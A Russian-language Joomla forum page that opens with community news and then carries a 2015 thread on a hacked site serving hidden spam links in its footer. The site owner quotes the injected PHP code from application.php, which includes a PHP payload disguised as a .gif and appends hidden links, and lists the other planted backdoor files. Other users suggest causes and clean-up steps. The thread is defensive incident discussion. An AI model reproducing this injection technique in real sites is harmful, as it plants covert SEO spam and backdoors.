Новости Joomla

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🗓 Голосование продлится до 27 февраля 2026 года.

👩‍💻 Проголосовать! 👩‍💻

Номинации, в которых можно проголосовать за Joomla:
⭐️ Best Free CMS
⭐️ Best Open Source CMS
⭐️ Best Enterprise CMS

Также в номинации Best e-Commerce Solution участвуют компоненты интернет-магазинов для Joomla:
⭐️ HikaShop
⭐️ Virtuemart

В номинации Best Website Builder оказались:
⭐️ YooTheme
⭐️ SP Page Builder

Что такое CMS Critic Awards?
С 2012 года премия CMS Critic Awards занимает особое место в сообществе систем управления контентом (CMS). Это единственный в своем роде сайт, который составляет рейтинг системы управления контентом и связанных с ними решений на рынке — от малого до крупного и подчеркивает их инновации и услуги.

Каждый год награда CMS Critic Awards присуждается одному победителю в различных отраслевых категориях, таких как: «Лучшая облачная CMS», «Лучший DXP», «Лучшая Headless CMS и других. Затем результаты оглашаются через СМИ вместе с выбором редакции CMS Critic.
В этом году премия вернулась к своим традициям и только TOP-5 движков по количеству номинаций попали в 2-й этап - голосование.

@joomlafeed

👩‍💻 Релиз JoomGallery 4.3.0 - компонент галереи изображений для Joomla.

👩‍💻 Релиз JoomGallery 4.3.0 - компонент галереи изображений для Joomla.

Одна из самых популярных и старейших фото-галерей для Joomla получила новую версию.

👉 v.4.3.0. Что нового?
Панель управления для зарегистрированных пользователей. В этой версии появилась возможность каждому зарегистрированному пользователю управлять своими категориями и изображениями во фронтенде сайта.

Документация по новой функции.
Сайт проекта

@joomlafeed

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

Вы уверенно чувствуете себя перед камерой, динамичны, обаятельны и всегда улыбаетесь? Чувствуете себя искателем приключений, готовым поделиться своими исследованиями CMS Joomla!, взять интервью у видных деятелей сообщества, пообщаться лично или по видеосвязи с волонтерами Joomla или отправиться на поиски новых идей?

Joomla ищет одного или нескольких волонтеров, готовых вдохнуть новую жизнь в обсуждение Joomla, ее CMS, пользователей, сообщества и многого другого.

Возможны самые разные форматы и темы: шортсы, интервью, аналитика и разборы в режиме реального времени, быстрые советы и рекомендации, знакомство с миром Joomla, изучение открытого исходного кода... Нет никаких ограничений!

Joomla! уже активно представлена ​​во многих социальных сетях:
- 155K подписчиков на Facebook,
- 55K подписчиков на X (ранее Twitter),
- 16K подписчиков на YouTube,
- 14K подписчиков на LinkedIn,
- 5,7K подписчиков в Instagram
а так же другие площадки ждут вас. Аккаунты Threads и Bluesky относительно новые, но их популярность только растёт!

А если хватит энергии, можно рассмотреть и TikTok!

❓ Итак, вы готовы?
👉 Свяжитесь с отделом маркетинга по адресу: marketing@community.joomla.org

Подробности в статье в Joomla Community Magazine.

@joomlafeed

1   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 11 Ответов
  • 2710 Просмотров
*

SELEVE

  • Осваиваюсь на форуме
  • 28
  • 0 / 0
Взломали сайт - чужие ссылки в подвале сайта
« : 11.02.2015, 11:41:24 »
Сегодня обнаружил взломанный сайт, в подвале сайта были ссылки написаны в диве размером 10px.

Может кому пригодится, нашел внедрение в фаиле /includes/application.php в 271 сроке
 
Код
		$document_render_content = str_replace('</body>', '', $document->render($caching, $params));
$document_render_content = str_replace('</html>', '', $document_render_content);

include_once($_SERVER['DOCUMENT_ROOT'].'/modules/mod_banners/header.gif');
		  
$document_render_content .= "<div style=\"font-size: 10px;\">".@$sys_lctr."</div>\n</body>\n</html>";

JResponse::setBody($document_render_content);

так же появились файлы в директориях:
/modules/mod_banners/     появились php файлы но расширение jpg стоит на них (base, data, header,highlight,icon,login,symbol,tools)   при открытии редактором в них находится код.

/modules/mod_footer/tmpl   фаил class_calendar.php   тоже с вирусом

фаил появился в корне (забыл как называется, какой-то инклудс пхп)

и один фаил появился в директории /media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img
фаил назывался img.php

дата создания всех файлов 19 января 15 года
Записан
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Взломали сайт - чужие ссылки в подвале сайта
« Ответ #1 : 11.02.2015, 16:03:46 »
Версия Joomla, количество сайтов на аккаунте хостинга?
Записан
*

SELEVE

  • Осваиваюсь на форуме
  • 28
  • 0 / 0
Re: Взломали сайт - чужие ссылки в подвале сайта
« Ответ #2 : 27.02.2015, 23:12:50 »
Версия 2.5.9.  сайтов на хосте около 20 где-то.
Были на хосте проблемы с рассылкой спама (тоже были созданы вирусные файлы, сайты находились в одном аккаунте, потом вылечил, разнес по разным аккаунтам),
Пострадали сайты старой версии Joomla, причем одной и той же версии (это не мои проекты были, другой человек все эти сайты заливал), взор упал что на почти всех сайтах был странный плагин фотогалереи, который превью сам собирает в кеш (файлы фото просто загружались в папку на FTP, видимо для более простого управления сайтом)
Записан
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Взломали сайт - чужие ссылки в подвале сайта
« Ответ #3 : 27.02.2015, 23:14:51 »
Разносите сайты по разным пользователям или аккаунтам хостинга или не избавитесь. Не вылечили.
Записан
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
Re: Взломали сайт - чужие ссылки в подвале сайта
« Ответ #4 : 27.02.2015, 23:17:14 »
Основная причина заражения - это вирус на ПК, который украл ftp пароль.

Цитировать
Разносите сайты по разным пользователям или аккаунтам хостинга или не избавитесь

Хорошее замечание. Именно так и нужно делать - изоляция юзеров.
« Последнее редактирование: 27.02.2015, 23:21:09 от capricorn »
Записан
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Взломали сайт - чужие ссылки в подвале сайта
« Ответ #5 : 27.02.2015, 23:21:33 »
Цитата: SELEVE от 27.02.2015, 23:12:50
сайтов на хосте около 20 где-то.

Все разнести. Не долечили просто. Да и обновить давно пора. Вряд ли вирус на ПК, но проверить не помешало бы.
Записан
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
Re: Взломали сайт - чужие ссылки в подвале сайта
« Ответ #6 : 27.02.2015, 23:30:17 »
Цитировать
дата создания всех файлов 19 января 15 года
посмотрите логи веб сервера за 19.01.2015. если там ничего нет, то залили по ftp. есть другие варианты?

Цитировать
Пострадали сайты старой версии Joomla
даже устаревший движок редко ломают. мне так кажется (надо нарваться на уж очень скрупулезного бота).


« Последнее редактирование: 27.02.2015, 23:35:41 от capricorn »
Записан
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Взломали сайт - чужие ссылки в подвале сайта
« Ответ #7 : 27.02.2015, 23:42:48 »
Цитата: capricorn от 27.02.2015, 23:30:17
даже устаревший движок редко ломают. мне так кажется (надо нарваться на уж очень скрупулезного бота).
Боты сейчас с высшим образованием  ;), уж поверьте, а FTP с ПК уже давно (с 2009-2010) не крадут, зачем время тратить когда стоит "псу" команду дать в виде домена, а он сам всю работу сделает.
Записан
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
Re: Взломали сайт - чужие ссылки в подвале сайта
« Ответ #8 : 28.02.2015, 00:01:05 »
Цитировать
а FTP с ПК уже давно (с 2009-2010) не крадут

Еще как крадут. Никогда не видели с MS Security Essentials (легальная Windows 7 Ultimate) - уровень оповещения "критический", а действие "разрешено"? Я как раз в это время покупал жд билет. Для меня это закончилось, к счастью, блокировкой банковской карты. До меня только потом дошло задуматься.
Записан
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Взломали сайт - чужие ссылки в подвале сайта
« Ответ #9 : 28.02.2015, 21:19:55 »
Не кажется ли Вам что FTP и платежный фишинг, немного разные вещи.
Записан
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Взломали сайт - чужие ссылки в подвале сайта
« Ответ #10 : 01.03.2015, 09:04:53 »
В скрупулезности ботов можно быть уверенным. Было до 300 логов в минуту на очень большое количество расширений. Бот не устает.
Записан
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
Re: Взломали сайт - чужие ссылки в подвале сайта
« Ответ #11 : 02.03.2015, 13:03:42 »
Цитировать
Не кажется ли Вам что FTP и платежный фишинг, немного разные вещи.

как раз в это время и сайт был заражен, именно по ftp.

вот еще интересная история. стоит почитать
http://ktonanovenkogo.ru/web-obzory/kak-proverit-sajt-na-virusy-proverka-onlajn-zarazheniya.html
Записан
1   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

 Ответов: 6
Просмотров: 3929 		Последний ответ 31.03.2024, 16:14:32
от SeBun
Редирект на спам ссылки. Как лчить?

Автор Евгений1980

 Ответов: 2
Просмотров: 2905 		Последний ответ 14.02.2024, 13:15:59
от wishlight
Компоненты и скрипты для защиты сайта. Логи атак на сайты

Автор wishlight

 Ответов: 678
Просмотров: 271432 		Последний ответ 14.09.2022, 14:29:43
от wishlight
Netflix! - Клиент поймал фишинг на старый сайт. Где порылись собаки?

Автор Alex_gs

 Ответов: 9
Просмотров: 2678 		Последний ответ 05.11.2021, 21:47:31
от wishlight
Способы защиты сайта от DDoS атак?

Автор IgorMJ

 Ответов: 7
Просмотров: 3240 		Последний ответ 05.10.2021, 21:39:26
от ShopES